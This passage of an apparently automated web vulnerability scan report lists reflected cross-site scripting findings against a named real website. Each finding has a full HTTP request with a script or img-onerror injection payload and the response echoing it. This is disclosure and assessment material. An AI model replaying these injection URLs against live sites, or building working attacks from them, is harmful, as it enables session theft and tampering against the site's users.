This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/search.php?keyword=search...&Submit3=Searchf9804<a>3af83332e1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?keyword=search...&Submit3=Searchf9804<a>3af83332e1&opt=2 was not found on this server.</p>
...[SNIP]...

2.595. http://www.resellerbase.com/communication/mobile-content/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da23b"><img%20src%3da%20onerror%3dalert(1)>30772013b4d was submitted in the cat parameter. This input was echoed as da23b\"><img src=a onerror=alert(1)>30772013b4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /communication/mobile-content/search.php?cat=16da23b"><img%20src%3da%20onerror%3dalert(1)>30772013b4d&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 21103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=16da23b\"><img src=a onerror=alert(1)>30772013b4d">
...[SNIP]...

2.596. http://www.resellerbase.com/communication/mobile-content/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ba5"><img%20src%3da%20onerror%3dalert(1)>837cf663a15c11d44 was submitted in the cat parameter. This input was echoed as b0ba5\"><img src=a onerror=alert(1)>837cf663a15c11d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/mobile-content/search.php?cat=16b0ba5"><img%20src%3da%20onerror%3dalert(1)>837cf663a15c11d44&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 21139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=16b0ba5\"><img src=a onerror=alert(1)>837cf663a15c11d44">
...[SNIP]...

2.597. http://www.resellerbase.com/communication/mobile-content/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 28df8<a>3144d6cb9f7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/search.php?keyword=search...28df8<a>3144d6cb9f7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?keyword=search...28df8<a>3144d6cb9f7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.598. http://www.resellerbase.com/communication/mobile-content/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f70c4<script>alert(1)</script>7c258a504a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/search.php?f70c4<script>alert(1)</script>7c258a504a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?f70c4<script>alert(1)</script>7c258a504a7=1 was not found on this server.</p>
...[SNIP]...

2.599. http://www.resellerbase.com/communication/mobile-content/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload af9ff<a>58bf6ba94b6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/search.php?keyword=search...&Submit3=Search&opt=2af9ff<a>58bf6ba94b6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?keyword=search...&Submit3=Search&opt=2af9ff<a>58bf6ba94b6 was not found on this server.</p>
...[SNIP]...

2.600. http://www.resellerbase.com/communication/mobile-content/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 992e5<script>alert(1)</script>35438db10d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication992e5<script>alert(1)</script>35438db10d7/mobile-content/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication992e5<script>alert(1)</script>35438db10d7/mobile-content/themes/ was not found on this server.</p>
...[SNIP]...

2.601. http://www.resellerbase.com/communication/mobile-content/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4840a<script>alert(1)</script>1838b5cc10e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content4840a<script>alert(1)</script>1838b5cc10e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content4840a<script>alert(1)</script>1838b5cc10e/themes/ was not found on this server.</p>
...[SNIP]...

2.602. http://www.resellerbase.com/communication/mobile-content/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3ac6d<script>alert(1)</script>ba8151a5693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes3ac6d<script>alert(1)</script>ba8151a5693/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes3ac6d<script>alert(1)</script>ba8151a5693/ was not found on this server.</p>
...[SNIP]...

2.603. http://www.resellerbase.com/communication/mobile-content/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bad23<script>alert(1)</script>d3848b6d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/?bad23<script>alert(1)</script>d3848b6d2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/?bad23<script>alert(1)</script>d3848b6d2=1 was not found on this server.</p>
...[SNIP]...

2.604. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb977<script>alert(1)</script>c548d66f9da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationfb977<script>alert(1)</script>c548d66f9da/mobile-content/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationfb977<script>alert(1)</script>c548d66f9da/mobile-content/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.605. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dab61<script>alert(1)</script>c1efcc801d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentdab61<script>alert(1)</script>c1efcc801d1/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentdab61<script>alert(1)</script>c1efcc801d1/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.606. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aac85<script>alert(1)</script>b366a9e023a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesaac85<script>alert(1)</script>b366a9e023a/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesaac85<script>alert(1)</script>b366a9e023a/kosmos/ was not found on this server.</p>
...[SNIP]...

2.607. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a25af<script>alert(1)</script>d7844d18ae9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmosa25af<script>alert(1)</script>d7844d18ae9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmosa25af<script>alert(1)</script>d7844d18ae9/ was not found on this server.</p>
...[SNIP]...

2.608. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90155<script>alert(1)</script>338e88faecb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/?90155<script>alert(1)</script>338e88faecb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/?90155<script>alert(1)</script>338e88faecb=1 was not found on this server.</p>
...[SNIP]...

2.609. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 644ed<script>alert(1)</script>51d519dc4b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication644ed<script>alert(1)</script>51d519dc4b1/mobile-content/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication644ed<script>alert(1)</script>51d519dc4b1/mobile-content/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.610. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e5e3<script>alert(1)</script>4b0fc55372e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content3e5e3<script>alert(1)</script>4b0fc55372e/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content3e5e3<script>alert(1)</script>4b0fc55372e/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.611. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 51e14<script>alert(1)</script>0e323ddf36a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes51e14<script>alert(1)</script>0e323ddf36a/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes51e14<script>alert(1)</script>0e323ddf36a/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.612. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18866<script>alert(1)</script>a74b2231622 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos18866<script>alert(1)</script>a74b2231622/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos18866<script>alert(1)</script>a74b2231622/images/ was not found on this server.</p>
...[SNIP]...

2.613. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/

Issue detail

